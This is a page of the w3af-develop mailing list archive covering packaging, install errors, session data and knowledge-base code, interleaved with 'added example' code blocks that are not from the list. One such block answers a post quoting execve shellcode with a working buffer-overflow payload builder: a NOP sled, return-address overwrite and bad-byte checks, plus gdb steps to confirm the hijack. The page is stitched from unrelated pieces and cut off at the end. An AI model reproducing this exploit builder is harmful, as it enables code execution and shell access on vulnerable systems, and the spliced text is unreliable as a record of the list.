w3af-develop Mailing List for w3af (Page 4)
Status: Beta
Brought to you by:
andresriancho
From: Andres R. <and...@gm...> - 2015-02-27 16:10:05

Guys,

Just found a GitHub ticket you might find interesting:
https://github.com/andresriancho/w3af/issues/3351

On Thu, Feb 26, 2015 at 10:37 AM, Nich Ramsey <oni...@gm...> wrote:
> Hi Andres,
>
> I just started building the packages with virtualenv on a local VM.
>
> On Feb 26, 2015 2:48 AM, "Andres Riancho" <and...@gm...> wrote:
>> Sergey,
>>
>> On Thu, Feb 26, 2015 at 1:30 AM, Sergey <w3...@ko...> wrote:
>>> Hi, Andres and everybody.
>>>
>>> Right now I see that we have working CI builds of w3af Docker images.
>>
>> We do! I've been working on the Docker images last week and you can
>> see the latest in the develop branch :)
>>
>>> I'd like to know if anybody has some setup for building w3af Debian
>>> packages, for example using virtualenv/dh-virtualenv or fabric/robe or
>>> something like this?
>>
>> Not that I know of, but you might be interested in this email thread
>> [0] where we discuss building Kali packages in an automated way. The
>> summary is:
>> * I would love to have automated builds of .deb
>> * We could use Docker images for testing the created .deb packages in
>>   Debian/Kali/etc.
>> * I've been using circleci.com and would like to continue using that
>>   CI system (free for open source)
>> * This repository is the closest thing we have to an automated .deb
>>   package build [1]
>>
>> If you want to help, let me know and we can draft a plan.
>>
>> [0] http://sourceforge.net/p/w3af/mailman/w3af-develop/thread/CA%2B1Rt66cek7ubXJHYe%2BbYxbUZg1HyvRDH7DViQkbUbvbWCxPLA%40mail.gmail.com/
>> [1] https://github.com/andresriancho/w3af-kali/
>
> I haven't worked with CircleCI before, but I would be willing to go along
> with Sergey on this if he wants to. If he wanted to tackle the CircleCI
> part alone, I could just share what I learn from the virtualenv build
> process.
>
>>> Thank you.
>>>
>>> _______________________________________________
>>> W3af-develop mailing list
>>> W3a...@li...
>>> https://lists.sourceforge.net/lists/listinfo/w3af-develop

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2015-02-26 10:47:40

Sergey,

On Thu, Feb 26, 2015 at 1:30 AM, Sergey <w3...@ko...> wrote:
> Hi, Andres and everybody.
>
> Right now I see that we have working CI builds of w3af Docker images.

We do! I've been working on the Docker images last week and you can
see the latest in the develop branch :)

> I'd like to know if anybody has some setup for building w3af Debian
> packages, for example using virtualenv/dh-virtualenv or fabric/robe or
> something like this?

Not that I know of, but you might be interested in this email thread
[0] where we discuss building Kali packages in an automated way. The
summary is:

* I would love to have automated builds of .deb
* We could use Docker images for testing the created .deb packages in
  Debian/Kali/etc.
* I've been using circleci.com and would like to continue using that
  CI system (free for open source)
* This repository is the closest thing we have to an automated .deb
  package build [1]

If you want to help, let me know and we can draft a plan.

[0] http://sourceforge.net/p/w3af/mailman/w3af-develop/thread/CA%2B1Rt66cek7ubXJHYe%2BbYxbUZg1HyvRDH7DViQkbUbvbWCxPLA%40mail.gmail.com/
[1] https://github.com/andresriancho/w3af-kali/

> Thank you.

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Sergey <w3...@ko...> - 2015-02-26 04:46:11

Hi, Andres and everybody.

Right now I see that we have working CI builds of w3af Docker images.

I'd like to know if anybody has some setup for building w3af Debian
packages, for example using virtualenv/dh-virtualenv or fabric/robe or
something like this?

Thank you.
From: Andres R. <and...@gm...> - 2015-02-23 11:21:04

Gorantla,

On Sun, Feb 22, 2015 at 3:05 PM, Gorantla sai <ah...@gm...> wrote:
> Hello guys,
>
> I'm Gorantla Sai, presently a Computer Science undergraduate studying at
> IIT BHU, and I'm working on a project which involves using data from
> w3af. After testing a web application using w3af, I can see that w3af is
> storing data in the /home/user/.w3af/tmp folder, but I'm unable to get the
> HTTP requests from main.db and the various files which have the .bloom
> extension. I have checked the files, but all of them seem to have data in
> some obfuscated form. I would like to know how to get the HTTP headers and
> responses. Any help would be appreciated. Thanks.

w3af doesn't obfuscate anything; the data might be in binary form, which
you don't know how to read (yet).

If you want all requests and responses, I believe the easiest thing to do
is to enable the text file output plugin, which will store that info in a
text file you define. If for some reason that's not what you want, please
take a look at the history_items table in the default database and the
.trace files [0].

[0] https://github.com/andresriancho/w3af/blob/master/w3af/core/data/db/history.py#L66

> Cheers,
> Gorantla Sai

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
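The following is an added example, written for this page and not code from w3af, of the second route Andres describes: reading request metadata straight out of the session database and locating the serialized request/response file for a row. Everything about the layout is an assumption rather than something the thread confirms: that main.db is SQLite, that the table is called history_items with at least an id column, and that the trace for row N is a file named N.trace in the same directory. The column list is discovered with PRAGMA table_info at run time instead of being hard-coded, so the script still works (with fewer fields) if the real schema differs; the sample session it builds is constructed test data, not a real scan.

```python
"""Pull the HTTP log out of a w3af session database (added example, not w3af code).

Assumptions (not confirmed by the thread):
  * the database is SQLite (the 'main.db' the question mentions);
  * the table is called history_items and has at least an 'id' column;
  * the raw request/response pair for row N lives in '<N>.trace' next to it.
Columns are discovered at run time so the script degrades gracefully if
the layout differs from these assumptions.
"""
import os
import sqlite3
import tempfile

TABLE = "history_items"
# Column names we would like to see; only those that really exist are selected.
WANTED = ("id", "method", "url", "code", "response_size", "time")


def history_columns(conn):
    """Return the subset of WANTED columns that the table actually has."""
    present = [row[1] for row in conn.execute("PRAGMA table_info(%s)" % TABLE)]
    return [c for c in WANTED if c in present]


def dump_history(db_path, limit=None):
    """Return one dict per logged request, in insertion order (rowid)."""
    conn = sqlite3.connect(db_path)
    try:
        cols = history_columns(conn)
        if not cols:
            raise ValueError("%s: no %s table with the expected columns" % (db_path, TABLE))
        sql = "SELECT %s FROM %s ORDER BY rowid" % (", ".join(cols), TABLE)
        if limit is not None:
            sql += " LIMIT %d" % int(limit)
        return [dict(zip(cols, row)) for row in conn.execute(sql)]
    finally:
        conn.close()


def trace_path(session_dir, item_id):
    """Assumed naming of the serialized request/response file for a row."""
    return os.path.join(session_dir, "%d.trace" % int(item_id))


def read_trace(session_dir, item_id):
    """Raw bytes of the trace file, or None if it is missing.

    The content is a binary serialization, not obfuscation; decoding it needs
    the same library w3af used to write it, which is version-specific."""
    path = trace_path(session_dir, item_id)
    if not os.path.exists(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()


def make_sample_session():
    """Constructed test data: a throw-away session dir holding a main.db in the
    assumed layout plus one dummy trace file. Not a real w3af scan."""
    session_dir = tempfile.mkdtemp(prefix="w3af-example-")
    db_path = os.path.join(session_dir, "main.db")
    conn = sqlite3.connect(db_path)
    conn.execute("CREATE TABLE history_items "
                 "(id INTEGER PRIMARY KEY, url TEXT, code INTEGER, method TEXT)")
    conn.executemany("INSERT INTO history_items VALUES (?, ?, ?, ?)", [
        (1, "http://target.example/", 200, "GET"),
        (2, "http://target.example/login", 302, "POST"),
    ])
    conn.commit()
    conn.close()
    with open(trace_path(session_dir, 2), "wb") as fh:
        fh.write(b"\x93constructed-binary-trace")
    return session_dir, db_path


if __name__ == "__main__":
    d, db = make_sample_session()
    for row in dump_history(db):
        print(row, "trace present:", read_trace(d, row["id"]) is not None)
```

Point it at a real session by replacing make_sample_session() with the path under ~/.w3af/tmp; if dump_history raises because none of the expected columns exist, inspect the schema with `sqlite3 main.db .schema` and adjust WANTED. For the text-file route Andres mentions first, the plugin is configured from w3af_console under `plugins` with `output text_file` followed by `output config text_file`, where the available options can be listed before setting them.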
From: Gorantla s. <ah...@gm...> - 2015-02-22 18:05:37

Hello guys,

I'm Gorantla Sai, presently a Computer Science undergraduate studying at
IIT BHU, and I'm working on a project which involves using data from w3af.
After testing a web application using w3af, I can see that w3af is storing
data in the /home/user/.w3af/tmp folder, but I'm unable to get the HTTP
requests from main.db and the various files which have the .bloom
extension. I have checked the files, but all of them seem to have data in
some obfuscated form. I would like to know how to get the HTTP headers and
responses. Any help would be appreciated. Thanks.

Cheers,
Gorantla Sai
From: Andres R. <and...@gm...> - 2015-02-03 14:21:25

Alejandro,

Forwarding a private conversation to a mailing list? Not cool! Also, this
mailing list is in English :( I'll answer just because... but please make
sure you respect mailing list etiquette in the future.

On Tue, Feb 3, 2015 at 11:15 AM, ALEJANDRO CARBALLO <ner...@gm...> wrote:
>
> ---------- Forwarded message ----------
> From: ALEJANDRO CARBALLO <ner...@gm...>
> Date: 2015-02-03 10:54 GMT-03:00
> Subject: Re: interest in learning web app security
> To: Andres Riancho <and...@gm...>
>
> [translated from Spanish]
> I did what you asked, and after installing what it required for Linux
> Mint 17 it ends with:
>
> Installing /home/alener/w3af/lib/python2.7/site-packages/darts.util.lru-0.5-py2.7-nspkg.pth
> Successfully installed lxml scapy-real guess-language cluster msgpack-python python-ntlm halberd darts.util.lru
> Cleaning up...
>
> but then, when running ./w3af_console, it ends with:
> ImportError: 'gitdb' could not be found in your PYTHONPATH

1- Are you using the same python to install the dependencies/run w3af?
2- Are you using python 2.7?
3- Not sure why, but maybe try with "pip install gitdb"?

> On 3 February 2015 at 9:43, ALEJANDRO CARBALLO <ner...@gm...> wrote:
>> Andrés: I'm in your chat now, although honestly I'm not at all used to
>> it; I don't know what your nick is, mine is alener.
>>
>> I tried to install w3af, but at the end I get this and don't know how to
>> continue:
>>
>> x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -I/usr/include/python2.7 -c src/lxml/lxml.etree.c -o build/temp.linux-x86_64-2.7/src/lxml/lxml.etree.o -w
>> In file included from src/lxml/lxml.etree.c:239:0:
>> src/lxml/etree_defs.h:9:31: fatal error: libxml/xmlversion.h: No such file or directory
>>  #include "libxml/xmlversion.h"
>>                                ^
>> compilation terminated.
>> error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
>> ----------------------------------------
>> Can't roll back lxml; was not uninstalled
>> Cleaning up...
>> Command /home/alener/w3af/bin/python -c "import setuptools, tokenize;__file__='/home/alener/w3af/build/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /tmp/pip-VJTZQM-record/install-record.txt --single-version-externally-managed --compile --install-headers /home/alener/w3af/include/site/python2.7 failed with error code 1 in /home/alener/w3af/build/lxml
>> Storing debug log for failure in /home/alener/.pip/pip.log
>>
>> On 2 February 2015 at 22:58, Andres Riancho <and...@gm...> wrote:
>>> Alejandro,
>>>
>>> Great that you're interested. Find me on the tool's IRC [0] between
>>> 9 am and 7 pm and we can talk more about the first steps there. If you
>>> want, you can start reading this wiki page [1], which helps with the
>>> first step.
>>>
>>> [0] http://w3af.org/community
>>> [1] https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
>>>
>>> 2015-02-02 22:07 GMT-03:00 ALEJANDRO CARBALLO <ner...@gm...>:
>>>> Hi, I'm not the one who started the thread on the PyAr forum, but I'm
>>>> interested in learning what you propose.
>>>>
>>>> I watched your talk from the last PyConAr and found it very
>>>> interesting; I also think you were quite clear.
>>>>
>>>> This is my GitHub account: https://github.com/alener
>>>>
>>>> I look forward to your reply.
>>>>
>>>> Regards, Alejandro Carballo

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: ALEJANDRO C. <ner...@gm...> - 2015-02-03 14:15:32

---------- Forwarded message ----------
From: ALEJANDRO CARBALLO <ner...@gm...>
Date: 2015-02-03 10:54 GMT-03:00
Subject: Re: interest in learning web app security
To: Andres Riancho <and...@gm...>

[translated from Spanish]
I did what you asked, and after installing what it required for Linux
Mint 17 it ends with:

Installing /home/alener/w3af/lib/python2.7/site-packages/darts.util.lru-0.5-py2.7-nspkg.pth
Successfully installed lxml scapy-real guess-language cluster msgpack-python python-ntlm halberd darts.util.lru
Cleaning up...

but then, when running ./w3af_console, it ends with:
ImportError: 'gitdb' could not be found in your PYTHONPATH

On 3 February 2015 at 9:43, ALEJANDRO CARBALLO <ner...@gm...> wrote:
> Andrés: I'm in your chat now, although honestly I'm not at all used to
> it; I don't know what your nick is, mine is alener.
>
> I tried to install w3af, but at the end I get this and don't know how to
> continue:
>
> x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -I/usr/include/python2.7 -c src/lxml/lxml.etree.c -o build/temp.linux-x86_64-2.7/src/lxml/lxml.etree.o -w
> In file included from src/lxml/lxml.etree.c:239:0:
> src/lxml/etree_defs.h:9:31: fatal error: libxml/xmlversion.h: No such file or directory
>  #include "libxml/xmlversion.h"
>                                ^
> compilation terminated.
> error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
> ----------------------------------------
> Can't roll back lxml; was not uninstalled
> Cleaning up...
> Command /home/alener/w3af/bin/python -c "import setuptools, tokenize;__file__='/home/alener/w3af/build/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /tmp/pip-VJTZQM-record/install-record.txt --single-version-externally-managed --compile --install-headers /home/alener/w3af/include/site/python2.7 failed with error code 1 in /home/alener/w3af/build/lxml
> Storing debug log for failure in /home/alener/.pip/pip.log
>
> On 2 February 2015 at 22:58, Andres Riancho <and...@gm...> wrote:
>> Alejandro,
>>
>> Great that you're interested. Find me on the tool's IRC [0] between
>> 9 am and 7 pm and we can talk more about the first steps there. If you
>> want, you can start reading this wiki page [1], which helps with the
>> first step.
>>
>> [0] http://w3af.org/community
>> [1] https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
>>
>> 2015-02-02 22:07 GMT-03:00 ALEJANDRO CARBALLO <ner...@gm...>:
>>> Hi, I'm not the one who started the thread on the PyAr forum, but I'm
>>> interested in learning what you propose.
>>>
>>> I watched your talk from the last PyConAr and found it very
>>> interesting; I also think you were quite clear.
>>>
>>> This is my GitHub account: https://github.com/alener
>>>
>>> I look forward to your reply.
>>>
>>> Regards, Alejandro Carballo
From: Andres R. <and...@gm...> - 2015-01-29 12:10:33

Nich,

I added some tests [0] to better understand your problem, and here is what
I got:

* get_uniq_id always returns a string. It might contain '-3829437', but it's
  a string.
* When we talked in private I told you that info_instance.copy() would
  return a copy of the instance; I was wrong. The right way to do that is
  copy.deepcopy(info_instance).
* No modification of the get_uniq_id implementation is needed.

[0] https://github.com/andresriancho/w3af/commit/72b3ea44bd78eedb180109a905cf084d74150971

On Thu, Jan 29, 2015 at 8:40 AM, Andres Riancho <and...@gm...> wrote:
> You mean here?
> https://github.com/andresriancho/w3af/blob/develop/w3af/core/data/kb/info.py#L260
>
> On Wed, Jan 28, 2015 at 11:19 PM, Nich Ramsey <oni...@gm...> wrote:
>> Seems like I fixed the issue. When calling get_desc() in Info.from_info()
>> it is necessary to call it using the with_id=False parameter. Otherwise,
>> information about where the vulnerability was identified gets concatenated
>> to the end of the description.
>>
>> I made the changes in w3af/core/data/kb/info.py and am pushing them to my
>> repo.
>>
>> On Wed, Jan 28, 2015 at 5:33 PM, Nich Ramsey <oni...@gm...> wrote:
>>> Hey everyone,
>>>
>>> So I have been working on an update method for the KB to update the
>>> pickled objects of Info and Vuln entries. I ran across a problem when
>>> attempting to copy the old instance to a new instance where I could make
>>> the updates.
>>>
>>> When I create the new instance using:
>>>
>>>     update_info = Info.from_info(old_info)
>>>
>>> the uniq_id of update_info is negative. This obviously causes an issue
>>> when trying to update the uniq_id in the database. Has anyone else run
>>> across this problem, or have a better way to copy an Info/Vuln instance?
>>>
>>> I also tried using old_info.copy(), but it just returns a copy of the
>>> dict part of the Info instance.

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
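The following is an added example, not w3af's code, that reproduces the three points of this thread with a stand-in class: a knowledge-base entry that extends dict and keeps its name, description and identifier in attributes. It shows why old_info.copy() hands back a plain dict with the attributes gone (dict.copy() never returns the subclass), why copy.deepcopy() gives an independent instance of the same class, and why a from_info() that calls get_desc() without with_id=False grows the description. InfoLike, its method names and the hash-derived, possibly negative identifier are modelling assumptions made for this example; w3af's real Info class may differ in detail.

```python
"""dict.copy() vs copy.deepcopy() on a dict subclass (added example, not w3af code).

InfoLike is a stand-in for a knowledge-base entry, modelled on the thread:
it extends dict, and its identifier and description are attributes rather
than keys. The id derivation is an assumption made for the example.
"""
import copy
import hashlib
import struct


class InfoLike(dict):
    """Knowledge-base entry: dict payload plus a few attributes."""

    def __init__(self, name, desc, **payload):
        super(InfoLike, self).__init__(payload)
        self._name = name
        self._desc = desc
        self._uniq_id = None

    def get_name(self):
        return self._name

    def get_desc(self, with_id=True):
        """with_id=True appends the identifier; calling this from from_info()
        without with_id=False glues that text onto every copied description."""
        if with_id:
            return "%s (found in request id %s)" % (self._desc, self.get_uniq_id())
        return self._desc

    def get_uniq_id(self):
        """Always a str. Here it is a signed 32-bit view of a hash (assumption
        for the example), so it can read like '-3829437' and still be a string."""
        if self._uniq_id is None:
            digest = hashlib.sha1(self._desc.encode("utf-8")).digest()
            self._uniq_id = str(struct.unpack("<i", digest[:4])[0])
        return self._uniq_id

    @classmethod
    def from_info(cls, other):
        """Rebuild an entry from another one; with_id=False keeps the
        description clean, which is the fix Nich describes."""
        return cls(other.get_name(), other.get_desc(with_id=False), **other)


def copy_with_dict_copy(info):
    """old_info.copy(): dict.copy() returns a plain dict, so the attributes
    (name, desc, uniq_id) are lost and only the key/value payload survives."""
    return info.copy()


def copy_with_deepcopy(info):
    """copy.deepcopy(old_info): a new instance of the same class, payload and
    attributes copied, independent of the original."""
    return copy.deepcopy(info)


def clone_for_update(info, **changes):
    """Independent copy with updates applied; the original is left untouched."""
    new = copy.deepcopy(info)
    new.update(changes)
    return new
```

deepcopy works here because Python's default pickling protocol for a dict subclass records the class, the instance __dict__ and the items, so the reconstructed object is an InfoLike with the same attributes; dict.copy() is implemented on dict itself and knows nothing about subclasses, which is exactly the behaviour Nich saw.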
From: Andres R. <and...@gm...> - 2015-01-29 11:41:17

You mean here?
https://github.com/andresriancho/w3af/blob/develop/w3af/core/data/kb/info.py#L260

On Wed, Jan 28, 2015 at 11:19 PM, Nich Ramsey <oni...@gm...> wrote:
> Seems like I fixed the issue. When calling get_desc() in Info.from_info()
> it is necessary to call it using the with_id=False parameter. Otherwise,
> information about where the vulnerability was identified gets concatenated
> to the end of the description.
>
> I made the changes in w3af/core/data/kb/info.py and am pushing them to my
> repo.
>
> On Wed, Jan 28, 2015 at 5:33 PM, Nich Ramsey <oni...@gm...> wrote:
>> Hey everyone,
>>
>> So I have been working on an update method for the KB to update the
>> pickled objects of Info and Vuln entries. I ran across a problem when
>> attempting to copy the old instance to a new instance where I could make
>> the updates.
>>
>> When I create the new instance using:
>>
>>     update_info = Info.from_info(old_info)
>>
>> the uniq_id of update_info is negative. This obviously causes an issue
>> when trying to update the uniq_id in the database. Has anyone else run
>> across this problem, or have a better way to copy an Info/Vuln instance?
>>
>> I also tried using old_info.copy(), but it just returns a copy of the
>> dict part of the Info instance.

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Nich R. <oni...@gm...> - 2015-01-29 02:19:47

Seems like I fixed the issue. When calling get_desc() in Info.from_info()
it is necessary to call it using the with_id=False parameter. Otherwise,
information about where the vulnerability was identified gets concatenated
to the end of the description.

I made the changes in w3af/core/data/kb/info.py and am pushing them to my
repo.

On Wed, Jan 28, 2015 at 5:33 PM, Nich Ramsey <oni...@gm...> wrote:
> Hey everyone,
>
> So I have been working on an update method for the KB to update the
> pickled objects of Info and Vuln entries. I ran across a problem when
> attempting to copy the old instance to a new instance where I could make
> the updates.
>
> When I create the new instance using:
>
>     update_info = Info.from_info(old_info)
>
> the uniq_id of update_info is negative. This obviously causes an issue
> when trying to update the uniq_id in the database. Has anyone else run
> across this problem, or have a better way to copy an Info/Vuln instance?
>
> I also tried using old_info.copy(), but it just returns a copy of the
> dict part of the Info instance.
From: Nich R. <oni...@gm...> - 2015-01-29 01:57:51

Hey everyone,

So I have been working on an update method for the KB to update the
pickled objects of Info and Vuln entries. I ran across a problem when
attempting to copy the old instance to a new instance where I could make
the updates.

When I create the new instance using:

    update_info = Info.from_info(old_info)

the uniq_id of update_info is negative. This obviously causes an issue
when trying to update the uniq_id in the database. Has anyone else run
across this problem, or have a better way to copy an Info/Vuln instance?

I also tried using old_info.copy(), but it just returns a copy of the
dict part of the Info instance.
From: hadi <alm...@ho...> - 2014-10-07 19:34:06

I'm using Linux and I have a C program. I would like to change the return
address to point to my shellcode, but I'm unable to do it. Can someone
point me to how to do it with the Linux gdb debugger?

Here is my shellcode:

    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

Here is my C program:

    #include <stdio.h>
    #include <stdlib.h>

    /* cookie and validate() are defined elsewhere in the exercise and are
       not part of the fragment posted here; declared so the file compiles. */
    extern unsigned cookie;
    extern void validate(int level);

    int global_value = 0;

    void bang(int val)
    {
        if (global_value == cookie) {
            printf("Bang!: You set global_value to 0x%x\n", global_value);
            validate(2);
        } else
            printf("Misfire: global_value = 0x%x\n", global_value);
        exit(0);
    }
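The following is an added example, not code from the post or from w3af, of the mechanical part of what hadi asks: laying out a buffer so the saved return address is overwritten with a pointer back into the payload. gdb still has to supply the two numbers that depend on the binary, which are parameters here: ret_offset, the distance from the start of the overflowed buffer to the saved return address (compare the buffer's address from `x/32xw $esp` with the saved-eip slot reported by `info frame`), and ret_addr, the address execution should land on, somewhere inside the NOP sled. The shellcode is the one quoted in the post with the line-wrap that split `\xc2` repaired; the offset and address used in the test are made up. The check for NUL and newline bytes matters because those terminate the usual copy into the buffer (strcpy, gets, scanf with %s), which is also why the shellcode itself avoids them.

```python
"""Stack-smashing payload builder for the shellcode in the post (added example).

ret_offset and ret_addr must come from the debugger for the real binary;
the values in the test below are invented.
"""
import struct

# The shellcode quoted in the post: execve("/bin//sh", NULL, NULL), then exit(0).
# 28 bytes, NUL-free (every x86-32 byte below is annotated).
SHELLCODE = (
    b"\x31\xc0"                  # xor  eax, eax
    b"\x50"                      # push eax            ; string terminator
    b"\x68\x2f\x2f\x73\x68"      # push "//sh"
    b"\x68\x2f\x62\x69\x6e"      # push "/bin"
    b"\x89\xe3"                  # mov  ebx, esp       ; filename = "/bin//sh"
    b"\x89\xc1"                  # mov  ecx, eax       ; argv = NULL
    b"\x89\xc2"                  # mov  edx, eax       ; envp = NULL
    b"\xb0\x0b"                  # mov  al, 11         ; SYS_execve
    b"\xcd\x80"                  # int  0x80
    b"\x31\xc0"                  # xor  eax, eax
    b"\x40"                      # inc  eax            ; SYS_exit
    b"\xcd\x80"                  # int  0x80
)

NOP = b"\x90"
# Bytes that commonly end the copy into the buffer (strcpy/gets/scanf %s).
TERMINATORS = (0x00, 0x0a)


def find_terminators(blob):
    """Offsets of bytes that would cut the copy short; [] means clean."""
    return [i for i, b in enumerate(blob) if b in TERMINATORS]


def build_payload(ret_offset, ret_addr, shellcode=SHELLCODE, extra_returns=0):
    """[NOP sled][shellcode][ret_addr x (1 + extra_returns)], little endian.

    ret_offset is the number of bytes between the buffer start and the
    saved EIP. extra_returns repeats the address past that slot so an
    offset guess that is off by a few words still hits a copy of it."""
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode (%d bytes) does not fit in the %d bytes "
                         "before the saved EIP" % (len(shellcode), ret_offset))
    sled = NOP * (ret_offset - len(shellcode))
    payload = sled + shellcode + struct.pack("<I", ret_addr) * (1 + extra_returns)
    bad = find_terminators(payload)
    if bad:
        raise ValueError("terminator bytes at offsets %r; choose another "
                         "return address or encode the payload" % bad)
    return payload


def payload_fits(ret_offset, ret_addr, shellcode=SHELLCODE):
    """True if build_payload() would succeed for these parameters."""
    try:
        build_payload(ret_offset, ret_addr, shellcode)
        return True
    except ValueError:
        return False


def write_payload(path, payload):
    """Write the raw bytes so gdb can feed them with: run < payload.bin"""
    with open(path, "wb") as fh:
        fh.write(payload)
    return len(payload)
```

Inside gdb, break on the vulnerable function's ret, run with the file as stdin, and confirm with `x/i $pc` after the return that execution is sitting in the sled; a wrong ret_addr shows up as SIGSEGV at that point. On a modern distribution this only works with the stack executable and ASLR off for the exercise, which is what such lab binaries are built for.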
From: Andres R. <and...@gm...> - 2014-09-18 11:39:31

On Thu, Sep 18, 2014 at 2:06 AM, Chuck Finley <cf...@gm...> wrote:
> Andres,
>
> Thanks for the response. It seems like it should be easy enough and I
> will give it my best shot :) I am hoping to have it done and issue a pull
> request by tomorrow night.

If you've got any doubts, I'm on IRC.

> - Justin
>
> On Wed, Sep 17, 2014 at 12:20 PM, Andres Riancho <and...@gm...> wrote:
>> PS: Please subscribe to the mailing list so you receive emails others
>> send to it
>>
>> On Wed, Sep 17, 2014 at 4:20 PM, Andres Riancho <and...@gm...> wrote:
>>> JB,
>>>
>>> Sorry for the delay in the response; since you didn't subscribe to
>>> the mailing list, your email was in the moderation queue (which I
>>> rarely check; I just accepted it because I saw your IRC message).
>>> Please read inline:
>>>
>>> On Mon, Sep 15, 2014 at 1:34 PM, Chuck Finley <cf...@gm...> wrote:
>>>> Good Morning Everyone,
>>>>
>>>> I am a Computer Science student that is very interested in web
>>>> security and penetration testing (about to begin studying for my
>>>> OSCP!). For my Software Engineering class we have been asked to make
>>>> a small contribution to an open-source project, so what better project
>>>> to contribute to than w3af! I am very familiar with the concept of
>>>> open-source projects; however, outside of creating a WordPress plugin,
>>>> I have not contributed to one.
>>>
>>> That's perfect, tell your professor/teacher that he rocks.
>>>
>>> We have two documents you'll find interesting:
>>> https://github.com/andresriancho/w3af/wiki/Contributing-101
>>> https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
>>>
>>>> Anyways, I was browsing through the Issues in the GitHub repo but I
>>>> feel like I might be too green to tackle some of those (despite some
>>>> Python experience). I wanted to reach out and see if there are any
>>>> small bugs or maybe an update to some documentation or something that
>>>> you guys might be able to recommend for me to update.
>>>
>>> Regarding the specific task you might try to implement, this is
>>> simple enough:
>>> https://github.com/andresriancho/w3af/issues/4794
>>>
>>> If that's too simple, then we can look into something else.
>>>
>>>> Don't worry, I am not just some student who wants someone to do their
>>>> homework for them, and then you will never hear from them again. I
>>>> want to actively contribute to this project going forward; I'm just
>>>> looking for a bit of guidance for my first (small) contribution, as we
>>>> are under a short timeline for this assignment.
>>>
>>> Cool! Feel free to contact me at #w3af, my nickname is __apr__
>>>
>>>> Thank you all very much and I look forward to being a part of the
>>>> w3af developer community!
>>>
>>> Welcome!
>>>
>>>> - JB

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2014-09-17 19:20:55

PS: Please subscribe to the mailing list so you receive emails others
send to it

On Wed, Sep 17, 2014 at 4:20 PM, Andres Riancho <and...@gm...> wrote:
> JB,
>
> Sorry for the delay in the response; since you didn't subscribe to
> the mailing list, your email was in the moderation queue (which I
> rarely check; I just accepted it because I saw your IRC message).
> Please read inline:
>
> On Mon, Sep 15, 2014 at 1:34 PM, Chuck Finley <cf...@gm...> wrote:
>> Good Morning Everyone,
>>
>> I am a Computer Science student that is very interested in web security
>> and penetration testing (about to begin studying for my OSCP!). For my
>> Software Engineering class we have been asked to make a small
>> contribution to an open-source project, so what better project to
>> contribute to than w3af! I am very familiar with the concept of
>> open-source projects; however, outside of creating a WordPress plugin,
>> I have not contributed to one.
>
> That's perfect, tell your professor/teacher that he rocks.
>
> We have two documents you'll find interesting:
> https://github.com/andresriancho/w3af/wiki/Contributing-101
> https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
>
>> Anyways, I was browsing through the Issues in the GitHub repo but I feel
>> like I might be too green to tackle some of those (despite some Python
>> experience). I wanted to reach out and see if there are any small bugs
>> or maybe an update to some documentation or something that you guys
>> might be able to recommend for me to update.
>
> Regarding the specific task you might try to implement, this is
> simple enough:
> https://github.com/andresriancho/w3af/issues/4794
>
> If that's too simple, then we can look into something else.
>
>> Don't worry, I am not just some student who wants someone to do their
>> homework for them, and then you will never hear from them again. I want
>> to actively contribute to this project going forward; I'm just looking
>> for a bit of guidance for my first (small) contribution, as we are under
>> a short timeline for this assignment.
>
> Cool! Feel free to contact me at #w3af, my nickname is __apr__
>
>> Thank you all very much and I look forward to being a part of the w3af
>> developer community!
>
> Welcome!
>
>> - JB

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2014-09-17 19:20:36
JB,

Sorry for the delay in the response, since you didn't subscribe to the mailing list your email was in the moderation queue (which I rarely check, just accepted it because I saw your IRC message). Please read inline:

On Mon, Sep 15, 2014 at 1:34 PM, Chuck Finley <cf...@gm...> wrote:
> Good Morning Everyone,
>
> I am a Computer Science student that is very interested in web security and penetration testing (about to begin studying for my OSCP!). For my Software Engineering class we have been asked to make a small contribution to an open-source project - so what better project to contribute to than W3af! I am very familiar with the concept of open-source projects, however outside of creating a Wordpress plugin, I have not contributed to one.

That's perfect, tell your professor/teacher that he rocks.

We have two documents you'll find interesting:
https://github.com/andresriancho/w3af/wiki/Contributing-101
https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor

> Anyways, I was browsing through the Issues in the Github repo but I feel like I might be too green to tackle some of those (despite some Python experience). I wanted to reach out and see if there are any small bugs or maybe an update to some Documentation or something that you guys might be able to recommend for me to update.

Regarding the specific task you might try to implement, this is simple enough:
